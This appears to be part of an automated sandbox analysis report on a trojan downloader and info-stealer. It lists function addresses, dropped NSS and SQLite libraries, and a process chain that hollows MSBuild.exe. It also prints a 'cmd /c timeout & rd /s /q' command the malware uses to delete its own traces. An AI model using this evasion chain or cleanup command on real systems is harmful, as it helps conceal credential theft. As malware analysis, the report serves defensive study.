Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_0012FFC9	11_2_0012FFC9
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_0010FFF0	11_2_0010FFF0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00109FE0	11_2_00109FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0040F819	13_2_0040F819
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00443D4F	13_2_00443D4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00401000	13_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0041900F	13_2_0041900F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0040F0C0	13_2_0040F0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004150C0	13_2_004150C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0040A0E0	13_2_0040A0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004410E0	13_2_004410E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0040B0F0	13_2_0040B0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004320A3	13_2_004320A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00411100	13_2_00411100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00430120	13_2_00430120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004471F0	13_2_004471F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00420233	13_2_00420233
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004352D0	13_2_004352D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004252E2	13_2_004252E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0042C2EE	13_2_0042C2EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004012F3	13_2_004012F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004112A3	13_2_004112A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0043C2A0	13_2_0043C2A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004452A0	13_2_004452A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004122B0	13_2_004122B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0040134E	13_2_0040134E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00429370	13_2_00429370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00408320	13_2_00408320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0042D327	13_2_0042D327
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004453F0	13_2_004453F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00444460	13_2_00444460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0040D4D0	13_2_0040D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00415497	13_2_00415497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0042B500	13_2_0042B500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00429500	13_2_00429500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00435500	13_2_00435500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00423510	13_2_00423510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0042D530	13_2_0042D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0041A596	13_2_0041A596
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0041C596	13_2_0041C596
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0040A5A0	13_2_0040A5A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004275B0	13_2_004275B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004455B0	13_2_004455B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00401602	13_2_00401602
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004316CE	13_2_004316CE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00403770	13_2_00403770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00428770	13_2_00428770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00445700	13_2_00445700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0042E7C2	13_2_0042E7C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004207E0	13_2_004207E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004457F0	13_2_004457F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00444870	13_2_00444870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0040D8C0	13_2_0040D8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004078D0	13_2_004078D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0042C8DA	13_2_0042C8DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0043B970	13_2_0043B970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0042F900	13_2_0042F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0042C931	13_2_0042C931
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00416982	13_2_00416982
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00432992	13_2_00432992
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00446990	13_2_00446990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00421A60	13_2_00421A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0041FAC9	13_2_0041FAC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0042BAF1	13_2_0042BAF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00436A90	13_2_00436A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0041BAAE	13_2_0041BAAE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00445B20	13_2_00445B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0043BBD0	13_2_0043BBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00411C5B	13_2_00411C5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0040AC60	13_2_0040AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00427C6E	13_2_00427C6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0040BC00	13_2_0040BC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00422C00	13_2_00422C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0043CC17	13_2_0043CC17
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00423C30	13_2_00423C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00446C30	13_2_00446C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0040ED40	13_2_0040ED40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00444D60	13_2_00444D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00408D70	13_2_00408D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0041BD73	13_2_0041BD73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0042AD00	13_2_0042AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00436D00	13_2_00436D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00404E60	13_2_00404E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0041EE2E	13_2_0041EE2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00406ED0	13_2_00406ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00446F00	13_2_00446F00

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6CC7DAE0 appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6CA194D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6CC709D0 appears 140 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6CB13620 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 0040C720 appears 70 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6CA0CBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004104BC appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004105DE appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 0040DF70 appears 198 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6CB19B10 appears 31 times
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: String function: 000D9210 appears 51 times
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: String function: 0010B610 appears 99 times
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: String function: 0010CE60 appears 198 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: String function: 00C49210 appears 51 times

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 304

Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe

Static PE information: invalid certificate

Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, 00000000.00000000.2031021442.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameproquota.exej% vs SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Binary or memory string: OriginalFilenameproquota.exej% vs SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe

Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Static PE information: Section: .data ZLIB complexity 0.9920572916666667
Source: AKEGIIJDGH.exe.2.dr	Static PE information: Section: .data ZLIB complexity 0.991082702020202
Source: a43486128347[1].exe.2.dr	Static PE information: Section: .data ZLIB complexity 0.991082702020202

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@18/37@14/12

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_6CA37030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

2_2_6CA37030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_0041147A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

2_2_0041147A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_0041196C __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z,__EH_prolog3_catch,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,

2_2_0041196C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\QKVQIRDN.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2140:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4712
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6008

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: C:\ProgramData\AKEGIIJDGH.exe	Command line argument: MZx	11_2_000D20FE
Source: C:\ProgramData\AKEGIIJDGH.exe	Command line argument: MZx	11_2_000D20FE
Source: C:\ProgramData\AKEGIIJDGH.exe	Command line argument: MZx	11_2_000D20FE

Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: MSBuild.exe, 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000002.00000002.2533391221.000000001A653000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2537554205.00000000205C8000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: MSBuild.exe, 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000002.00000002.2533391221.000000001A653000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2537554205.00000000205C8000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: MSBuild.exe, 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000002.00000002.2533391221.000000001A653000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2537554205.00000000205C8000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: MSBuild.exe, 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000002.00000002.2533391221.000000001A653000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2537554205.00000000205C8000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: MSBuild.exe, 00000002.00000002.2533391221.000000001A653000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2537554205.00000000205C8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: MSBuild.exe, 00000002.00000002.2533391221.000000001A653000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2537554205.00000000205C8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: MSBuild.exe, MSBuild.exe, 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000002.00000002.2533391221.000000001A653000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2537554205.00000000205C8000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: MSBuild.exe, 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000002.00000002.2533391221.000000001A653000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2537554205.00000000205C8000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: MSBuild.exe, 00000002.00000002.2533391221.000000001A653000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2537554205.00000000205C8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: JDGIID.2.dr, GDAAKF.2.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: MSBuild.exe, 00000002.00000002.2533391221.000000001A653000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2537554205.00000000205C8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: MSBuild.exe, 00000002.00000002.2533391221.000000001A653000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2537554205.00000000205C8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 304
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\AKEGIIJDGH.exe "C:\ProgramData\AKEGIIJDGH.exe"
Source: C:\ProgramData\AKEGIIJDGH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\AKEGIIJDGH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\AKEGIIJDGH.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6008 -s 300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BKFIJJEGHDAE" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\AKEGIIJDGH.exe "C:\ProgramData\AKEGIIJDGH.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BKFIJJEGHDAE" & exit	Jump to behavior
Source: C:\ProgramData\AKEGIIJDGH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\ProgramData\AKEGIIJDGH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dbghelp.dll	Jump to behavior
